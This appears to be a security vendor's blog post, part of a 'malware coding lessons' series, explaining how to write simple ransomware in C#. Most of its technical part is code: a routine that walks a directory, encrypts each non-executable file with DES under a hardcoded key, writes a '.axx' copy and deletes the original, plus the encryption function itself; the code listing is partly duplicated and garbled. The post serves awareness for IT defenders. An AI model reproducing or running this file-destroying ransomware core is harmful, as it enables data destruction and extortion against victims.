Varonis debuts trailblazing features for securing Salesforce. Learn More

Introducing Athena AI our new generative AI layer for the Varonis Data Security Platform.

Learn more

Malware Coding Lessons for IT People, Part II: Fun With FUD Ransomware!

4 min read
Last updated February 24, 2022

This article is part of the series "Malware Coding Lessons for IT People". Check out the rest:

Let’s not overthink ransomware! It’s just a small malicious piece of code with one devious goal — encrypting all of the user’s important files. It the unfortunate victim wants to recover them he or she will have to pay a hefty amount to retrieve the decryption key.

How hard is ransomware?

In this post, I’ll show you how incredibly easy it is to code a FUD (Fully Undetected) ransomware using public Microsoft libraries with C#.

Ransomware 101

As I discussed in my previous post, there are a few ways to get infected with malware – for starters, malicious attachments, rogue websites, and phishing campaigns, as well as some other creative methods I’ll cover in a future post.

Ok, say we’ve clicked on a malicious ransomware file. What’s going to happen next? Persistency!

Persistency is the code used by hacker to enable the malware to survive restarts and to disguise the software so it would be hard to detect (and remove). While persistency is (usually) generic across many different malware families, there are some unique techniques for ransomware. I’ll get into this in a future post.

Get the Free Pentesting Active
Directory Environments e-book

At its core, ransomware is just software that performs bulk encryption of the data contents in the victim’s file system. Typically, asymmetric encryption — with different keys for encryption and decryption — is preferred by hackers since it is much harder to recover the data.

This asymmetric algorithm is based on the idea of encrypting the files contents with a public key, but using a different private key that only that attacker has for decryption. You can learn more about asymmetric encryption here:

The malware can also choose a weaker encryption method, such as symmetric encryption algorithm, in which the same key is used for both encryption and decryption.

To make the code even simpler, we will use an API that does the symmetric encryption algorithm.

And Now the Code

The next part of the software that newbies need to know about is traversing the file system. Essentially, you’re travelling through the directory hierarchy, collecting file pathname, and then feeding the file contents to the encryption engine. Then of course the file has to be written back.

The list of the files to be encrypted is usually the ones companies are dependent on. We’re talking documents, spreadsheets, images, presentations, audio, and emails. By the way, hackers usually will not encrypt movies due to the size and the impact on the malwares performance. That’s a small consolation—employees can be watching movies while IT is restoring from a backup.

Once the files list is generated after navigating the directories, it’s a good idea to wait for an appropriate time to start the encryption. The idea is to then encrypt as much file contents as possible from the list before being detected.

More sophisticated ransomware will attempt to learn the idle time of the infected computer — when there’s CPU available– and slip in the encryption processing at appropriate times to avoid detection.

Enough talk, here’s the code.

First snippet: Choose a random key to encrypt the data with:

  1. string key = "R?\n??i??";
string key = "R?\n??i??";

Basically you can choose any key that you like, remember that we are going to choose symmetric algorithm so the key will be used for encrypting and decrypting as well.

Second snippet:   Encrypt an entire directory contents:

  1. private static void EncryptDir(string d,int mili)
  2. {
  3. DirectoryInfo dirtoencrypt = new DirectoryInfo(d);
  4. FileInfo[] file;
  5. file = dirtoencrypt.GetFiles();
  6. foreach (FileInfo currentFile in file)
  7. {
  8. if (currentFile.Extension.ToLower() != ".exe")
  9. {
  10. string key = "R?\n??i??";
  11. EncryptFile(currentFile.FullName, currentFile.FullName + ".axx", key);
  12. File.Delete(currentFile.FullName);
  13. Thread.Sleep(mili);
  14. }
  15. }
  16. }
private static void EncryptDir(string d,int mili)
            DirectoryInfo dirtoencrypt = new DirectoryInfo(d);
            FileInfo[] file;
            file = dirtoencrypt.GetFiles();
            foreach (FileInfo currentFile in file)
                if (currentFile.Extension.ToLower() != ".exe")
                    string key = "R?\n??i??";
                    EncryptFile(currentFile.FullName, currentFile.FullName + ".axx", key);


Third Snippet: The encrypting function, taken directly from MSDN (

  1. static void EncryptFile(string sInputFilename, \
  2. static void EncryptFile(string sInputFilename, string sOutputFilename, string sKey)
  3. {
  4. FileStream fsInput = new FileStream(sInputFilename,
  5. FileMode.Open,
  6. FileAccess.Read);
  8. FileStream fsEncrypted = new FileStream(sOutputFilename,
  9. FileMode.Create,
  10. FileAccess.Write);
  11. DESCryptoServiceProvider DES = new DESCryptoServiceProvider();
  12. DES.Key = ASCIIEncoding.ASCII.GetBytes(sKey);
  13. DES.IV = ASCIIEncoding.ASCII.GetBytes(sKey);
  14. ICryptoTransform desencrypt = DES.CreateEncryptor();
  15. CryptoStream cryptostream = new CryptoStream(fsEncrypted,
  16. desencrypt,
  17. CryptoStreamMode.Write);
  19. byte[] bytearrayinput = new byte[fsInput.Length];
  20. fsInput.Read(bytearrayinput, 0, bytearrayinput.Length);
  21. cryptostream.Write(bytearrayinput, 0, bytearrayinput.Length);
  22. cryptostream.Close();
  23. fsInput.Close();
  24. fsEncrypted.Close();
  25. }
static void EncryptFile(string sInputFilename, \
static void EncryptFile(string sInputFilename, string sOutputFilename, string sKey)
            FileStream fsInput = new FileStream(sInputFilename,

            FileStream fsEncrypted = new FileStream(sOutputFilename,
            DESCryptoServiceProvider DES = new DESCryptoServiceProvider();
            DES.Key = ASCIIEncoding.ASCII.GetBytes(sKey);
            DES.IV = ASCIIEncoding.ASCII.GetBytes(sKey);
            ICryptoTransform desencrypt = DES.CreateEncryptor();
            CryptoStream cryptostream = new CryptoStream(fsEncrypted,

            byte[] bytearrayinput = new byte[fsInput.Length];
            fsInput.Read(bytearrayinput, 0, bytearrayinput.Length);
            cryptostream.Write(bytearrayinput, 0, bytearrayinput.Length);


That’s it!

A malicious tool with tons of damage potential in less than a 100 lines of code and under 10kb after compiling.

I’ll put together more pieces of the ransomware puzzle in another post.

What you should do now

Below are three ways we can help you begin your journey to reducing data risk at your company:

  1. Schedule a demo session with us, where we can show you around, answer your questions, and help you see if Varonis is right for you.
  2. Download our free report and learn the risks associated with SaaS data exposure.
  3. Share this blog post with someone you know who'd enjoy reading it. Share it with them via email, LinkedIn, Reddit, or Facebook.
Try Varonis free.
Get a detailed data risk report based on your company’s data.
Deploys in minutes.
Keep reading
Speed Data: The Next Generation of Cybersecurity With Mark Weber
Executive in Residence for the Catholic University of America Mark Weber shares tips for mentoring future cybersecurity professionals.
Varonis Leads DSPM Market on Gartner Peer Insights
As a leader in data security, Varonis is proud to be rated No. 1 in Gartner’s Data Security Posture Management category.
Speed Data: Fusing Empathy and Enterprise With Illena Armstrong
Illena Armstrong shares her advice for future executives, discusses the importance of teamwork, and explains why empathy is powerful for leaders.
AI At Work: Three Steps To Prepare And Protect Your Business
Discover how your business can prepare and protect your sensitive data from the risks that generative AI presents.